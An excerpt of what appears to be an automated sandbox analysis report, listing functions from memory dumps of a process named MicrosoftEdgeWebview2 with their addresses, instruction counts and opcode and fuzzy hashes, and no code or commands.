              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b45beed69a11b52b304ae46254e0a38b453e270f65154075d952a1e604154980
              • Instruction ID: 058095200d04c8fa7202100c25bee052bdb463837e92db6ad2c20012951a56ce
              • Opcode Fuzzy Hash: b45beed69a11b52b304ae46254e0a38b453e270f65154075d952a1e604154980
              • Instruction Fuzzy Hash: 9551FF21B1E6C90FD79AABB848756757FE1DF97219B0800FAE09DCB1E7DD086806C342
              Function 00007FFD9B6B0C2E Relevance: .8, Instructions: 773COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 482763d8f581b8c191fbdaf1c9e9618b21cd100e455958453c42202c2a1eb9fd
              • Instruction ID: 1a076f2c747c8d18addc4c2848216d2d04a8f3d2153f374d269187b71f5c8143
              • Opcode Fuzzy Hash: 482763d8f581b8c191fbdaf1c9e9618b21cd100e455958453c42202c2a1eb9fd
              • Instruction Fuzzy Hash: 9A917922F0EA9A0FE755A76898655F87FF1EF86210B4900BBC059CB1E7DE287C468741
              Function 00007FFD9B6B04D8 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97b784499c1ccf7532af5f5c9d431d8570b7c0d7f5921e9caedf60f8fd7a1c22
              • Instruction ID: 41eb521e1f7b4306bb55573f562c17fdb6989114d063e39a6e8cc85b7867b0e3
              • Opcode Fuzzy Hash: 97b784499c1ccf7532af5f5c9d431d8570b7c0d7f5921e9caedf60f8fd7a1c22
              • Instruction Fuzzy Hash: 7331F121B1D9490FE798EB6C846A679B7D2EF98345F0401BEE05EC32EBDD68AC418341
              Function 00007FFD9B6B0AC9 Relevance: .1, Instructions: 124COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction ID: 885e5a0fea639032a052f269dcaea601df7ebd4501dd46d441fad32984016ee8
              • Opcode Fuzzy Hash: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction Fuzzy Hash: E6310611B199190FE798BBBC58297B977D2EFD8701F4402BBE41CC72D7DE2868418791
              Function 00007FFD9B6B0985 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aef68f87bbfea7aa3dc7d7d51f6cdf2bdaf9f2015d772990d4d4698258211a1b
              • Instruction ID: 90e04544202703375c9ad6a6008fbc423810ab3824b3a6170937d9fc2212f47c
              • Opcode Fuzzy Hash: aef68f87bbfea7aa3dc7d7d51f6cdf2bdaf9f2015d772990d4d4698258211a1b
              • Instruction Fuzzy Hash: D5319371B1895E4FEB44FBA88475AEDBBF1FF98300F900579D419D7686DE38A8018B40
              Function 00007FFD9B6B088C Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b698f1626ecc7b694f6e9792f3be09d36828f034b7f011645dbc75f02ddc5acf
              • Instruction ID: 159dad3143ad31c11e0d68d36b709f11f6812168e5dea50eff2a375a594e8776
              • Opcode Fuzzy Hash: b698f1626ecc7b694f6e9792f3be09d36828f034b7f011645dbc75f02ddc5acf
              • Instruction Fuzzy Hash: 4621B33576498E5BD748FB1880A9DA9FEB1FFA9300FE044A8E80DC77CADD7469008B41
              Function 00007FFD9B6B1E01 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13dc8e8ab53f9b831929343729095ef6cf9406664fdacb00de3aab25e868cedf
              • Instruction ID: 630a37fa69e166ab19cd4785e3a3c3c2cb2f1806ecabfff459357d6e5cbba438
              • Opcode Fuzzy Hash: 13dc8e8ab53f9b831929343729095ef6cf9406664fdacb00de3aab25e868cedf
              • Instruction Fuzzy Hash: BA014701A0DAE41FE7A1673C28794757FF0CFA2720B0905AAE4A8CA0E6D8047A428781

              Non-executed Functions

              Function 00007FFD9B6B0710 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: O_^ $O_^"$O_^$$O_^&
              • API String ID: 0-3636004760
              • Opcode ID: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction ID: 3a184c77386bbf4aa69513a3d76d5a616a8868164c12500c2b36bd44a76674bd
              • Opcode Fuzzy Hash: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction Fuzzy Hash: 222124A3A0F1654EE31227B96CB14E87F609F0061C30941F6C0FE8E197EE18319A8A84

              Executed Functions

              Function 00007FFD9B6B12B9 Relevance: .8, Instructions: 812COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44fa92d31c0faad7cc5a1ba7208a72be45b517d777170e396409ad6abc891e99
              • Instruction ID: 1796b8cc73f7870beebe8c5f1adaa706952de5dd937b4410f5e120aeab5d828b
              • Opcode Fuzzy Hash: 44fa92d31c0faad7cc5a1ba7208a72be45b517d777170e396409ad6abc891e99
              • Instruction Fuzzy Hash: C142F621B2DA594BEBA8EB7884756BDB7E1FF98300F40057DE41EC72D6DE28B8418741
              Function 00007FFD9B6B1C4D Relevance: .2, Instructions: 195COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce6f0c505d613a8bf2264619c5c551923ef60d13daad3a0574f1664564fc6d62
              • Instruction ID: 25b3c15f0ffa42d6b74c06edc6c4a8e7805a9faf681982b593b42e3d4b4d9013
              • Opcode Fuzzy Hash: ce6f0c505d613a8bf2264619c5c551923ef60d13daad3a0574f1664564fc6d62
              • Instruction Fuzzy Hash: 44510F21B1E6C90FD79AABB848756757FE1DF87219B0800FAE09DCB1E7DD086806C342
              Function 00007FFD9B6B0C2E Relevance: .8, Instructions: 773COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c00e4646ccf14d1e61a4c555f626e9b1446fcaa7224bf8ca4383765a30525862
              • Instruction ID: cfc4f99f4015f07a427b1c25f4579fcffe570ba9408e2d93b80b69b8744df13d
              • Opcode Fuzzy Hash: c00e4646ccf14d1e61a4c555f626e9b1446fcaa7224bf8ca4383765a30525862
              • Instruction Fuzzy Hash: AD916821F0EA9A0FEB95A76898715F87FF1EF86210B4900B7D059CB1E7DE287C468741
              Function 00007FFD9B6B04D8 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7adc31cdfdda2bffbbe759de1ea26c3da51445ecc1fe1de06caf9a2a4d0f6ab6
              • Instruction ID: d7ab91db75604bb1f4a00c889cd24803c1a8c52a0f4cbe369669fc3f0b3ba27f
              • Opcode Fuzzy Hash: 7adc31cdfdda2bffbbe759de1ea26c3da51445ecc1fe1de06caf9a2a4d0f6ab6
              • Instruction Fuzzy Hash: 2531F121B1D9490FE798EB6C847A679B7D2EF98345F0401BEE05EC32EBDD68AC418341
              Function 00007FFD9B6B0AC9 Relevance: .1, Instructions: 124COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction ID: 885e5a0fea639032a052f269dcaea601df7ebd4501dd46d441fad32984016ee8
              • Opcode Fuzzy Hash: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction Fuzzy Hash: E6310611B199190FE798BBBC58297B977D2EFD8701F4402BBE41CC72D7DE2868418791
              Function 00007FFD9B6B0985 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7be16c87dbc116f8d3f606e82d544c05896e9c2317fbd9eb34ccc71cfb17109
              • Instruction ID: b256c5b41baac101405c78127fbd04888389fd7d89a9d8a2b076ba7ba540cd3c
              • Opcode Fuzzy Hash: b7be16c87dbc116f8d3f606e82d544c05896e9c2317fbd9eb34ccc71cfb17109
              • Instruction Fuzzy Hash: B231A471B1891D4FDF44EBA88475AED7BB1FF98300F9405B9D419D72C6DE38A8418740
              Function 00007FFD9B6B088C Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2e0f6a8a66fc2da7b696e7ace6f3752e29c9a67b8ee737aef23cf93f1beec35
              • Instruction ID: 3739607aa420e14c260dd08c74bedfa0b17b5007a89e78b8599444b013a6e9b1
              • Opcode Fuzzy Hash: f2e0f6a8a66fc2da7b696e7ace6f3752e29c9a67b8ee737aef23cf93f1beec35
              • Instruction Fuzzy Hash: F8218035B6494D5BDF48EF5880B59ADBE71FF89200BE044A8E81AC73CEDE346D508740
              Function 00007FFD9B6B1E01 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 785449ee778b2d3a42373dc866a98c319f507d18fd6bfee71cbd3d05b25c5271
              • Instruction ID: e99386fa6cbaf7a104f10b404e51947dcc9b94872f5f513d26ecf8ad032754b1
              • Opcode Fuzzy Hash: 785449ee778b2d3a42373dc866a98c319f507d18fd6bfee71cbd3d05b25c5271
              • Instruction Fuzzy Hash: 42017B01E0DAE41FEBA1673C28754757FF0DF92320B0905ABE4A8CF0E7D8047A428781

              Non-executed Functions

              Function 00007FFD9B6B0710 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2418702258.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: O_^ $O_^"$O_^$$O_^&
              • API String ID: 0-3636004760
              • Opcode ID: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction ID: 3a184c77386bbf4aa69513a3d76d5a616a8868164c12500c2b36bd44a76674bd
              • Opcode Fuzzy Hash: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction Fuzzy Hash: 222124A3A0F1654EE31227B96CB14E87F609F0061C30941F6C0FE8E197EE18319A8A84

              Executed Functions

              Function 00007FFD9B6C12B9 Relevance: .8, Instructions: 812COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a44c13e353cd3fb93729ae7f5797817bce08bb00945b89e08edb6bc5d2bce16
              • Instruction ID: 0268be64248779a1e147ba8c05e509781b41ea7d717e9e6183b6c3a4cd68ee90
              • Opcode Fuzzy Hash: 6a44c13e353cd3fb93729ae7f5797817bce08bb00945b89e08edb6bc5d2bce16
              • Instruction Fuzzy Hash: 0C420721B19A0A4FE7A8FB7C84756B977D2FF98700F400579E55EC72D6DE28B8028741
              Function 00007FFD9B6C0C2E Relevance: .8, Instructions: 771COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf27163a331187bc614531a5cd99314806f9c087a86a9c9cbb8796550b797b55
              • Instruction ID: 8b2a8b7776951e293942e225594d1cf1b0f7a657bac0b17e15dd04ae3030db16
              • Opcode Fuzzy Hash: bf27163a331187bc614531a5cd99314806f9c087a86a9c9cbb8796550b797b55
              • Instruction Fuzzy Hash: 7D915922F0EA8A0FE755BB6C88651F97BE1EF86310B4900B7D459CB1E7DD287C428341
              Function 00007FFD9B6C0AC9 Relevance: .1, Instructions: 124COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2bb08f8627cef14790ecadd638327fb629c2ac056bdebe440d5ef670e2d9abb2
              • Instruction ID: def6cb9f9f278fac47c0bb714a36073fc74d792d035be0fa9618941002c649a2
              • Opcode Fuzzy Hash: 2bb08f8627cef14790ecadd638327fb629c2ac056bdebe440d5ef670e2d9abb2
              • Instruction Fuzzy Hash: 28312621B199090FEB94BBBC58297BD77D2EFA8701F4402BBE41CC72D7DE2869018381
              Function 00007FFD9B6C082D Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 47c66fdf0e228add875d62df3b8ec71c0e11e680d80e08526e6efc35d2f1f3a3
              • Instruction ID: db872293571c16ee3e10e19b166aa71b4a38978c3ec60bbd60e93290488c99b6
              • Opcode Fuzzy Hash: 47c66fdf0e228add875d62df3b8ec71c0e11e680d80e08526e6efc35d2f1f3a3
              • Instruction Fuzzy Hash: 16313369B59A4A9FDB44FB6C84B04B97F70EF85300B8040B9D45ECB2DAEF24A9028751
              Function 00007FFD9B6C07F0 Relevance: .1, Instructions: 116COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d531a3cf971d886a8f273068beb10db2121f8954befeb56e09d813ed8d6e0b8
              • Instruction ID: d80d6be3673a0e3160d456a965cef0f445cadd3178b785eff5c90ea9c7554df7
              • Opcode Fuzzy Hash: 4d531a3cf971d886a8f273068beb10db2121f8954befeb56e09d813ed8d6e0b8
              • Instruction Fuzzy Hash: 24310629B5A90A5BD744FB6C90618FA7F61EF85300BC080B5D95ECB3DBEF24A9438750
              Function 00007FFD9B6C0985 Relevance: .1, Instructions: 110COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6ff8c4185b72b6b5bb01ed1935107bf13138c6b069be473b9923bdadf51c2f77
              • Instruction ID: f808fa7e06239519b04b1b2d6d769cc5b6d279245aa52daa893236d5c7a757ef
              • Opcode Fuzzy Hash: 6ff8c4185b72b6b5bb01ed1935107bf13138c6b069be473b9923bdadf51c2f77
              • Instruction Fuzzy Hash: D6319135B1890E4FEB54FBA884756FDB7A1FF98300F8005B9D519D7296DE39A8428740
              Function 00007FFD9B6C0848 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 226cbe1e7443929c43788d277827c38bcafff73bc2f201dba762c200e07d97d3
              • Instruction ID: 3ddefd189f12f9267e6478a1a5b7aef062573b9071a5b19e434c39f4d479c764
              • Opcode Fuzzy Hash: 226cbe1e7443929c43788d277827c38bcafff73bc2f201dba762c200e07d97d3
              • Instruction Fuzzy Hash: 6621B679B64D0E5FD744EB6C90609BABF71EF89300BC044A9D85AC73DAEF34A9028750

              Non-executed Functions

              Function 00007FFD9B6C0710 Relevance: 5.1, Strings: 4, Instructions: 85COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2923528343.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ffd9b6c0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: N_^ $N_^"$N_^$$N_^&
              • API String ID: 0-1033049488
              • Opcode ID: b6d5ec74bdcc98026e09decb9e32e3880b4c17e5f434fb755b1caec9f1b40154
              • Instruction ID: 47c2c81be8f21168c3d9a124f946962cca427d4bbdb9abdafa3d133341caffc6
              • Opcode Fuzzy Hash: b6d5ec74bdcc98026e09decb9e32e3880b4c17e5f434fb755b1caec9f1b40154
              • Instruction Fuzzy Hash: B72124A3A0F1950BE31637B86CB20F93F90DF0161C31941F6C6FA8E093ED18718AC686